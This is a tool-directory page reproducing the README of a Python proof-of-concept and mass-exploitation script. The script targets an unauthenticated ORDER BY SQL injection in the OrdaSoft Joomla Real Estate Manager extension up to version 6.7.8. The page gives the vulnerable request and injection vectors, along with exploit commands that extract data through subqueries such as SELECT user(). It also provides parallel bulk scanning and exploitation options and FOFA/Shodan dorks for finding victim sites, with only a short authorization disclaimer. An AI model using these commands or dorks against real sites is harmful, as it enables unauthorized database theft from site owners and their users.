Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/murrez/cve-2026-100752
ReconnaissanceVulnerability ScannersVulnerability AnalysisExploitationScripting & AutomationWeb Application ExploitationInformation GatheringWeb SecurityPenetration Testing
GitHubmurrez/cve-2026-100752

CVE-2026-100752

Python 3 PoC and mass exploit for CVE-2026-100752, an unauthenticated SQL injection in OrdaSoft Joomla Real Estate Manager <=6.7.8 via the order_field ORDER BY parameter.

4 days agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
View Repository

CVE-2026-100752 — OrdaSoft Real Estate Manager (Free) unauthenticated SQL injection

Python 3 PoC for CVE-2026-100752 — OrdaSoft Real Estate Manager (Free) Joomla extension ≤ 6.7.8. Fixed in 6.7.9+.

PoCbithttps://pocbit.org/pocs/cve-2026-100752
Cataloghttps://pocbit.org/pocs/
Componentcom_realestatemanager
Filesite/realestatemanager.php
Parameterorder_field → ORDER BY (unquoted, no allow-list)
AuthNone (public listing / search / category views)
CWECWE-89 SQL Injection
AlsoLegacy order_direction POST injection (Metasploit / pre-6.7.9 audits)

PoC output (screenshot)

Renkli PoCbit banner, ardından --mode exploit JSON çıktısı: exploited: true, vektör order_field_get, rota showCategory + com_realestatemanager.

CVE-2026-100752 exploit mode — PoCbit CLI and JSON result (order_field_get, sqli_extract_ok)

Örnek komut:

python poc.py -u https://TARGET --mode exploit --subquery "SELECT VERSION()"

(Ekran görüntüsü yetkili test ortamından alınmıştır; hedef URL PoC doğrulaması içindir.)


Vulnerability summary (Türkçe)

Real Estate Manager (Free), Joomla üzerinde emlak ilanı yönetimi yapan OrdaSoft eklentisidir. 6.7.8 ve önceki sürümlerde, order_field istek parametresi site/realestatemanager.php içinde ORDER BY cümlesine doğrudan eklenir; sütun adı allow-list’i, kaçış veya cast yoktur. Kimlik doğrulaması olmadan kategori gezintisi, arama sonuçları ve tam ilan listesi sorguları istismar edilebilir.

Başarılı SQLi ile veritabanından okuma (sürüm, kullanıcı hash’leri, site verisi), yetkilere bağlı yazma/silme ve zincirleme RCE riski değerlendirilmelidir. 6.7.9 veya üzeri sürüme yükseltin (OrdaSoft security release).


Technical mechanism

Joomla front controller:

GET /index.php?option=com_realestatemanager&task=showCategory&catid=50&order_field=price&order_direction=asc

CVE-2026-100752: order_field controls the ORDER BY column/expression. Values such as error-based subqueries can be injected because the value is concatenated into SQL without binding or validation.

Affected query contexts (per CVE text):

  1. Category browsing (showCategory and related)
  2. Search results
  3. Full property listing

This PoC:

  • Fingerprint com_realestatemanager (paths + optional manifest version)
  • Scrape catid / Itemid from site HTML
  • Probe tasks: showCategory, showSearch, showSearchResult, showRent, showBuy
  • Primary: order_field error-based GET and POST
  • Fallback: order_direction=asc,<injection> (historical vector, still useful on some builds)
  • Check + mass check → hits.txt
  • Exploit + mass exploit → exploited.txt (lines with successful SELECT leak)

Requirements

cd CVE-2026-100752
pip install -r requirements.txt

Usage

Single target — check

python poc.py -u https://target.example --mode check
python poc.py -u https://target.example --mode check --aggressive

--aggressive attempts SELECT VERSION() when boolean/error proof is inconclusive.

Single target — exploit

python poc.py -u https://target.example --mode exploit
python poc.py -u https://target.example --mode exploit --subquery "SELECT user()"
python poc.py -u https://target.example --mode exploit --vector order_field_get

Mass bulk

python poc.py --list targets.example.txt --mode check -j 30 --output scan.jsonl --vuln-list hits.txt
python poc.py --list hits.txt --mode exploit -j 15 --subquery "SELECT VERSION()" --exploited-list exploited.txt
FlagRole
--mode exploitError-based data extraction (mass supported)
--subqueryInner SQL for CONCAT(0x7e, …) double-query payload
--vectorForce order_field_get, order_field_post, or order_direction_post
-jParallel targets
--no-colorPlain terminal

JSONL includes pocbit, pocbit_catalog, pocbit_page, cve, component.


FOFA / asset discovery dorks

body="option=com_realestatemanager"
body="com_realestatemanager" && (body="ordasoft" || header="Joomla")
title="Real Estate" && body="com_realestatemanager"
body="/components/com_realestatemanager/"

Shodan-style (if supported): http.html:com_realestatemanager

Export hostnames into targets.txt (one URL per line), then check → hits → exploit only on authorized estates.


Version detection

Manifest (when exposed):

  • /administrator/components/com_realestatemanager/realestatemanager.xml

If version ≤ 6.7.8 → likely_vulnerable_version. If ≥ 6.7.9 → patched_version (exploit may still fail).


Related CVEs (same release train)

CVETypeFixed
CVE-2026-100752Unauth SQLi (order_field)6.7.9
CVE-2026-100753Reflected XSS (public property views)6.7.9

Same vendor batch (Sep 2026): Vehicle Manager and other OrdaSoft extensions received separate CVEs — patch all OrdaSoft components you run.


References

  • PoCbit CVE-2026-100752
  • CVE.report CVE-2026-100752
  • JoomClub — six flaws in three OrdaSoft extensions (Sep 2026)
  • Metasploit: auxiliary/gather/joomla_com_realestatemanager_sqli (legacy order_direction POST)

Legal

Authorized security testing and patch validation only. Do not use against systems without permission.


GitHub repository description

CVE-2026-100752 PoC: OrdaSoft Joomla Real Estate Manager (Free) <=6.7.8 unauth SQLi via order_field ORDER BY (com_realestatemanager). Colored check + mass exploit, version fingerprint, PoCbit https://pocbit.org/pocs/cve-2026-100752
Download Tool